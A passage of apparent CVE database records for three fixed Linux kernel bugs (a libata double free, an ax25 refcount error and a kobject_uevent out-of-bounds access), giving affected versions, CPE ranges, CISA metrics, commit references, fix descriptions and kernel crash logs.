"version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
"versionType": "git"
},
{
"lessThan": "702c1edbafb2e6f9d20f6d391273b5be09d366a5",
"status": "affected",
"version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
"versionType": "git"
},
{
"lessThan": "062e256516d7db5e7dcdef117f52025cd5c456e3",
"status": "affected",
"version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
"versionType": "git"
},
{
"lessThan": "8106da4d88bbaed809e023cc8014b766223d6e76",
"status": "affected",
"version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
"versionType": "git"
},
{
"lessThan": "ab9e0c529eb7cafebdd31fe1644524e80a48b05d",
"status": "affected",
"version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/ata/libata-core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.17"
},
{
"lessThan": "4.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-core: Fix double free on error\n\nIf e.g. the ata_port_alloc() call in ata_host_alloc() fails, we will jump\nto the err_out label, which will call devres_release_group().\ndevres_release_group() will trigger a call to ata_host_release().\nata_host_release() calls kfree(host), so executing the kfree(host) in\nata_host_alloc() will lead to a double free:\n\nkernel BUG at mm/slub.c:553!\nOops: invalid opcode: 0000 [#1] PREEMPT SMP NOPTI\nCPU: 11 PID: 599 Comm: (udev-worker) Not tainted 6.10.0-rc5 #47\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:kfree+0x2cf/0x2f0\nCode: 5d 41 5e 41 5f 5d e9 80 d6 ff ff 4d 89 f1 41 b8 01 00 00 00 48 89 d9 48 89 da\nRSP: 0018:ffffc90000f377f0 EFLAGS: 00010246\nRAX: ffff888112b1f2c0 RBX: ffff888112b1f2c0 RCX: ffff888112b1f320\nRDX: 000000000000400b RSI: ffffffffc02c9de5 RDI: ffff888112b1f2c0\nRBP: ffffc90000f37830 R08: 0000000000000000 R09: 0000000000000000\nR10: ffffc90000f37610 R11: 617461203a736b6e R12: ffffea00044ac780\nR13: ffff888100046400 R14: ffffffffc02c9de5 R15: 0000000000000006\nFS: 00007f2f1cabe980(0000) GS:ffff88813b380000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f2f1c3acf75 CR3: 0000000111724000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n ? __die_body.cold+0x19/0x27\n ? die+0x2e/0x50\n ? do_trap+0xca/0x110\n ? do_error_trap+0x6a/0x90\n ? kfree+0x2cf/0x2f0\n ? exc_invalid_op+0x50/0x70\n ? kfree+0x2cf/0x2f0\n ? asm_exc_invalid_op+0x1a/0x20\n ? ata_host_alloc+0xf5/0x120 [libata]\n ? ata_host_alloc+0xf5/0x120 [libata]\n ? kfree+0x2cf/0x2f0\n ata_host_alloc+0xf5/0x120 [libata]\n ata_host_alloc_pinfo+0x14/0xa0 [libata]\n ahci_init_one+0x6c9/0xd20 [ahci]\n\nEnsure that we will not call kfree(host) twice, by performing the kfree()\nonly if the devres_open_group() call failed."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:47.923Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/290073b2b557e4dc21ee74a1e403d9ae79e393a2"
},
{
"url": "https://git.kernel.org/stable/c/56f1c7e290cd6c69c948fcd2e2a49e6a637ec38f"
},
{
"url": "https://git.kernel.org/stable/c/010de9acbea58fbcbda08e3793d6262086a493fe"
},
{
"url": "https://git.kernel.org/stable/c/5dde5f8b790274723640d29a07c5a97d57d62047"
},
{
"url": "https://git.kernel.org/stable/c/702c1edbafb2e6f9d20f6d391273b5be09d366a5"
},
{
"url": "https://git.kernel.org/stable/c/062e256516d7db5e7dcdef117f52025cd5c456e3"
},
{
"url": "https://git.kernel.org/stable/c/8106da4d88bbaed809e023cc8014b766223d6e76"
},
{
"url": "https://git.kernel.org/stable/c/ab9e0c529eb7cafebdd31fe1644524e80a48b05d"
}
],
"title": "ata: libata-core: Fix double free on error",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41087",
"datePublished": "2024-07-29T15:48:03.127Z",
"dateReserved": "2024-07-12T12:17:45.634Z",
"dateUpdated": "2025-05-04T09:21:47.923Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36009 (GCVE-0-2024-36009)
Vulnerability from cvelistv5
Published
2024-05-20 09:48
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ax25: Fix netdev refcount issue
The dev_tracker is added to ax25_cb in ax25_bind(). When the
ax25 device is detaching, the dev_tracker of ax25_cb should be
deallocated in ax25_kill_by_device() instead of the dev_tracker
of ax25_dev. The log reported by ref_tracker is shown below:
[ 80.884935] ref_tracker: reference already released.
[ 80.885150] ref_tracker: allocated in:
[ 80.885349] ax25_dev_device_up+0x105/0x540
[ 80.885730] ax25_device_event+0xa4/0x420
[ 80.885730] notifier_call_chain+0xc9/0x1e0
[ 80.885730] __dev_notify_flags+0x138/0x280
[ 80.885730] dev_change_flags+0xd7/0x180
[ 80.885730] dev_ifsioc+0x6a9/0xa30
[ 80.885730] dev_ioctl+0x4d8/0xd90
[ 80.885730] sock_do_ioctl+0x1c2/0x2d0
[ 80.885730] sock_ioctl+0x38b/0x4f0
[ 80.885730] __se_sys_ioctl+0xad/0xf0
[ 80.885730] do_syscall_64+0xc4/0x1b0
[ 80.885730] entry_SYSCALL_64_after_hwframe+0x67/0x6f
[ 80.885730] ref_tracker: freed in:
[ 80.885730] ax25_device_event+0x272/0x420
[ 80.885730] notifier_call_chain+0xc9/0x1e0
[ 80.885730] dev_close_many+0x272/0x370
[ 80.885730] unregister_netdevice_many_notify+0x3b5/0x1180
[ 80.885730] unregister_netdev+0xcf/0x120
[ 80.885730] sixpack_close+0x11f/0x1b0
[ 80.885730] tty_ldisc_kill+0xcb/0x190
[ 80.885730] tty_ldisc_hangup+0x338/0x3d0
[ 80.885730] __tty_hangup+0x504/0x740
[ 80.885730] tty_release+0x46e/0xd80
[ 80.885730] __fput+0x37f/0x770
[ 80.885730] __x64_sys_close+0x7b/0xb0
[ 80.885730] do_syscall_64+0xc4/0x1b0
[ 80.885730] entry_SYSCALL_64_after_hwframe+0x67/0x6f
[ 80.893739] ------------[ cut here ]------------
[ 80.894030] WARNING: CPU: 2 PID: 140 at lib/ref_tracker.c:255 ref_tracker_free+0x47b/0x6b0
[ 80.894297] Modules linked in:
[ 80.894929] CPU: 2 PID: 140 Comm: ax25_conn_rel_6 Not tainted 6.9.0-rc4-g8cd26fd90c1a #11
[ 80.895190] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qem4
[ 80.895514] RIP: 0010:ref_tracker_free+0x47b/0x6b0
[ 80.895808] Code: 83 c5 18 4c 89 eb 48 c1 eb 03 8a 04 13 84 c0 0f 85 df 01 00 00 41 83 7d 00 00 75 4b 4c 89 ff 9
[ 80.896171] RSP: 0018:ffff888009edf8c0 EFLAGS: 00000286
[ 80.896339] RAX: 1ffff1100141ac00 RBX: 1ffff1100149463b RCX: dffffc0000000000
[ 80.896502] RDX: 0000000000000001 RSI: 0000000000000246 RDI: ffff88800a0d6518
[ 80.896925] RBP: ffff888009edf9b0 R08: ffff88806d3288d3 R09: 1ffff1100da6511a
[ 80.897212] R10: dffffc0000000000 R11: ffffed100da6511b R12: ffff88800a4a31d4
[ 80.897859] R13: ffff88800a4a31d8 R14: dffffc0000000000 R15: ffff88800a0d6518
[ 80.898279] FS: 00007fd88b7fe700(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[ 80.899436] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 80.900181] CR2: 00007fd88c001d48 CR3: 000000000993e000 CR4: 00000000000006f0
...
[ 80.935774] ref_tracker: sp%d@000000000bb9df3d has 1/1 users at
[ 80.935774] ax25_bind+0x424/0x4e0
[ 80.935774] __sys_bind+0x1d9/0x270
[ 80.935774] __x64_sys_bind+0x75/0x80
[ 80.935774] do_syscall_64+0xc4/0x1b0
[ 80.935774] entry_SYSCALL_64_after_hwframe+0x67/0x6f
Change ax25_dev->dev_tracker to the dev_tracker of ax25_cb
in order to mitigate the bug.
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: feef318c855a361a1eccd880f33e88c460eb63b4 Version: feef318c855a361a1eccd880f33e88c460eb63b4 Version: feef318c855a361a1eccd880f33e88c460eb63b4 Version: feef318c855a361a1eccd880f33e88c460eb63b4 Version: b8c07f33aa35dacf5444e7053ed9662d1869f536 Version: b1e0a6fc7f17500484c402ad1cd018c24dfc14b3 Version: 7528d0f2210c3a1154186175516ed37aa970f2b1 Version: 57cc15f5fd550316e4104eaf84b90fbc640fd7a5 Version: b982492ec3a115e0a136856a1b2dbe32f2d21a0e |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36009",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-13T20:06:19.404612Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-13T20:06:29.490Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:12.796Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d14f104027e30720582448706c7d6b43065c851"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4fee8fa86a15d7790268eea458b1aec69c695530"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c42b073d9af4a5329b25b17390c63ab3847f30e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/467324bcfe1a31ec65d0cf4aa59421d6b7a7d52b"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/05/30/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/05/30/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ax25/af_ax25.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0d14f104027e30720582448706c7d6b43065c851",
"status": "affected",
"version": "feef318c855a361a1eccd880f33e88c460eb63b4",
"versionType": "git"
},
{
"lessThan": "4fee8fa86a15d7790268eea458b1aec69c695530",
"status": "affected",
"version": "feef318c855a361a1eccd880f33e88c460eb63b4",
"versionType": "git"
},
{
"lessThan": "c42b073d9af4a5329b25b17390c63ab3847f30e8",
"status": "affected",
"version": "feef318c855a361a1eccd880f33e88c460eb63b4",
"versionType": "git"
},
{
"lessThan": "467324bcfe1a31ec65d0cf4aa59421d6b7a7d52b",
"status": "affected",
"version": "feef318c855a361a1eccd880f33e88c460eb63b4",
"versionType": "git"
},
{
"status": "affected",
"version": "b8c07f33aa35dacf5444e7053ed9662d1869f536",
"versionType": "git"
},
{
"status": "affected",
"version": "b1e0a6fc7f17500484c402ad1cd018c24dfc14b3",
"versionType": "git"
},
{
"status": "affected",
"version": "7528d0f2210c3a1154186175516ed37aa970f2b1",
"versionType": "git"
},
{
"status": "affected",
"version": "57cc15f5fd550316e4104eaf84b90fbc640fd7a5",
"versionType": "git"
},
{
"status": "affected",
"version": "b982492ec3a115e0a136856a1b2dbe32f2d21a0e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ax25/af_ax25.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.17"
},
{
"lessThan": "5.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.277",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.240",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.190",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.10.112",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.15.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nax25: Fix netdev refcount issue\n\nThe dev_tracker is added to ax25_cb in ax25_bind(). When the\nax25 device is detaching, the dev_tracker of ax25_cb should be\ndeallocated in ax25_kill_by_device() instead of the dev_tracker\nof ax25_dev. The log reported by ref_tracker is shown below:\n\n[ 80.884935] ref_tracker: reference already released.\n[ 80.885150] ref_tracker: allocated in:\n[ 80.885349] ax25_dev_device_up+0x105/0x540\n[ 80.885730] ax25_device_event+0xa4/0x420\n[ 80.885730] notifier_call_chain+0xc9/0x1e0\n[ 80.885730] __dev_notify_flags+0x138/0x280\n[ 80.885730] dev_change_flags+0xd7/0x180\n[ 80.885730] dev_ifsioc+0x6a9/0xa30\n[ 80.885730] dev_ioctl+0x4d8/0xd90\n[ 80.885730] sock_do_ioctl+0x1c2/0x2d0\n[ 80.885730] sock_ioctl+0x38b/0x4f0\n[ 80.885730] __se_sys_ioctl+0xad/0xf0\n[ 80.885730] do_syscall_64+0xc4/0x1b0\n[ 80.885730] entry_SYSCALL_64_after_hwframe+0x67/0x6f\n[ 80.885730] ref_tracker: freed in:\n[ 80.885730] ax25_device_event+0x272/0x420\n[ 80.885730] notifier_call_chain+0xc9/0x1e0\n[ 80.885730] dev_close_many+0x272/0x370\n[ 80.885730] unregister_netdevice_many_notify+0x3b5/0x1180\n[ 80.885730] unregister_netdev+0xcf/0x120\n[ 80.885730] sixpack_close+0x11f/0x1b0\n[ 80.885730] tty_ldisc_kill+0xcb/0x190\n[ 80.885730] tty_ldisc_hangup+0x338/0x3d0\n[ 80.885730] __tty_hangup+0x504/0x740\n[ 80.885730] tty_release+0x46e/0xd80\n[ 80.885730] __fput+0x37f/0x770\n[ 80.885730] __x64_sys_close+0x7b/0xb0\n[ 80.885730] do_syscall_64+0xc4/0x1b0\n[ 80.885730] entry_SYSCALL_64_after_hwframe+0x67/0x6f\n[ 80.893739] ------------[ cut here ]------------\n[ 80.894030] WARNING: CPU: 2 PID: 140 at lib/ref_tracker.c:255 ref_tracker_free+0x47b/0x6b0\n[ 80.894297] Modules linked in:\n[ 80.894929] CPU: 2 PID: 140 Comm: ax25_conn_rel_6 Not tainted 6.9.0-rc4-g8cd26fd90c1a #11\n[ 80.895190] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qem4\n[ 80.895514] RIP: 0010:ref_tracker_free+0x47b/0x6b0\n[ 80.895808] Code: 83 c5 18 4c 89 eb 48 c1 eb 03 8a 04 13 84 c0 0f 85 df 01 00 00 41 83 7d 00 00 75 4b 4c 89 ff 9\n[ 80.896171] RSP: 0018:ffff888009edf8c0 EFLAGS: 00000286\n[ 80.896339] RAX: 1ffff1100141ac00 RBX: 1ffff1100149463b RCX: dffffc0000000000\n[ 80.896502] RDX: 0000000000000001 RSI: 0000000000000246 RDI: ffff88800a0d6518\n[ 80.896925] RBP: ffff888009edf9b0 R08: ffff88806d3288d3 R09: 1ffff1100da6511a\n[ 80.897212] R10: dffffc0000000000 R11: ffffed100da6511b R12: ffff88800a4a31d4\n[ 80.897859] R13: ffff88800a4a31d8 R14: dffffc0000000000 R15: ffff88800a0d6518\n[ 80.898279] FS: 00007fd88b7fe700(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000\n[ 80.899436] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 80.900181] CR2: 00007fd88c001d48 CR3: 000000000993e000 CR4: 00000000000006f0\n...\n[ 80.935774] ref_tracker: sp%d@000000000bb9df3d has 1/1 users at\n[ 80.935774] ax25_bind+0x424/0x4e0\n[ 80.935774] __sys_bind+0x1d9/0x270\n[ 80.935774] __x64_sys_bind+0x75/0x80\n[ 80.935774] do_syscall_64+0xc4/0x1b0\n[ 80.935774] entry_SYSCALL_64_after_hwframe+0x67/0x6f\n\nChange ax25_dev-\u003edev_tracker to the dev_tracker of ax25_cb\nin order to mitigate the bug."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:13.855Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0d14f104027e30720582448706c7d6b43065c851"
},
{
"url": "https://git.kernel.org/stable/c/4fee8fa86a15d7790268eea458b1aec69c695530"
},
{
"url": "https://git.kernel.org/stable/c/c42b073d9af4a5329b25b17390c63ab3847f30e8"
},
{
"url": "https://git.kernel.org/stable/c/467324bcfe1a31ec65d0cf4aa59421d6b7a7d52b"
}
],
"title": "ax25: Fix netdev refcount issue",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36009",
"datePublished": "2024-05-20T09:48:08.238Z",
"dateReserved": "2024-05-17T13:50:33.152Z",
"dateUpdated": "2025-05-04T12:56:13.855Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42292 (GCVE-0-2024-42292)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
kobject_uevent: Fix OOB access within zap_modalias_env()
zap_modalias_env() wrongly calculates size of memory block to move, so
will cause OOB memory access issue if variable MODALIAS is not the last
one within its @env parameter, fixed by correcting size to memmove.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9b3fa47d4a76b1d606a396455f9bbeee083ef008 Version: 9b3fa47d4a76b1d606a396455f9bbeee083ef008 Version: 9b3fa47d4a76b1d606a396455f9bbeee083ef008 Version: 9b3fa47d4a76b1d606a396455f9bbeee083ef008 Version: 9b3fa47d4a76b1d606a396455f9bbeee083ef008 Version: 9b3fa47d4a76b1d606a396455f9bbeee083ef008 Version: 9b3fa47d4a76b1d606a396455f9bbeee083ef008 Version: 9b3fa47d4a76b1d606a396455f9bbeee083ef008 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42292",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:00.545656Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:29.474Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"lib/kobject_uevent.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "81a15d28f32af01493ae8c5457e0d55314a4167d",
"status": "affected",
"version": "9b3fa47d4a76b1d606a396455f9bbeee083ef008",
"versionType": "git"
},
{
"lessThan": "b59a5e86a3934f1b6a5bd1368902dbc79bdecc90",
"status": "affected",
"version": "9b3fa47d4a76b1d606a396455f9bbeee083ef008",
"versionType": "git"
},
{
"lessThan": "648d5490460d38436640da0812bf7f6351c150d2",
"status": "affected",
"version": "9b3fa47d4a76b1d606a396455f9bbeee083ef008",
"versionType": "git"
},
{
"lessThan": "c5ee8adc8d98a49703320d13878ba2b923b142f5",
"status": "affected",
"version": "9b3fa47d4a76b1d606a396455f9bbeee083ef008",
"versionType": "git"
},
{
"lessThan": "68d63ace80b76395e7935687ecdb86421adc2168",
"status": "affected",
"version": "9b3fa47d4a76b1d606a396455f9bbeee083ef008",
"versionType": "git"
},
{
"lessThan": "57fe01d3d04276875c7e3a6dc763517fc05b8762",
"status": "affected",
"version": "9b3fa47d4a76b1d606a396455f9bbeee083ef008",
"versionType": "git"
},
{
"lessThan": "d4663536754defff75ff1eca0aaebc41da165a8d",
"status": "affected",
"version": "9b3fa47d4a76b1d606a396455f9bbeee083ef008",
"versionType": "git"
},
{
"lessThan": "dd6e9894b451e7c85cceb8e9dc5432679a70e7dc",
"status": "affected",
"version": "9b3fa47d4a76b1d606a396455f9bbeee083ef008",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"lib/kobject_uevent.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nkobject_uevent: Fix OOB access within zap_modalias_env()\n\nzap_modalias_env() wrongly calculates size of memory block to move, so\nwill cause OOB memory access issue if variable MODALIAS is not the last\none within its @env parameter, fixed by correcting size to memmove."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:07.282Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/81a15d28f32af01493ae8c5457e0d55314a4167d"
},
{
"url": "https://git.kernel.org/stable/c/b59a5e86a3934f1b6a5bd1368902dbc79bdecc90"
},
{
"url": "https://git.kernel.org/stable/c/648d5490460d38436640da0812bf7f6351c150d2"
},
{
"url": "https://git.kernel.org/stable/c/c5ee8adc8d98a49703320d13878ba2b923b142f5"
},
{
"url": "https://git.kernel.org/stable/c/68d63ace80b76395e7935687ecdb86421adc2168"
},
{
"url": "https://git.kernel.org/stable/c/57fe01d3d04276875c7e3a6dc763517fc05b8762"
},
{
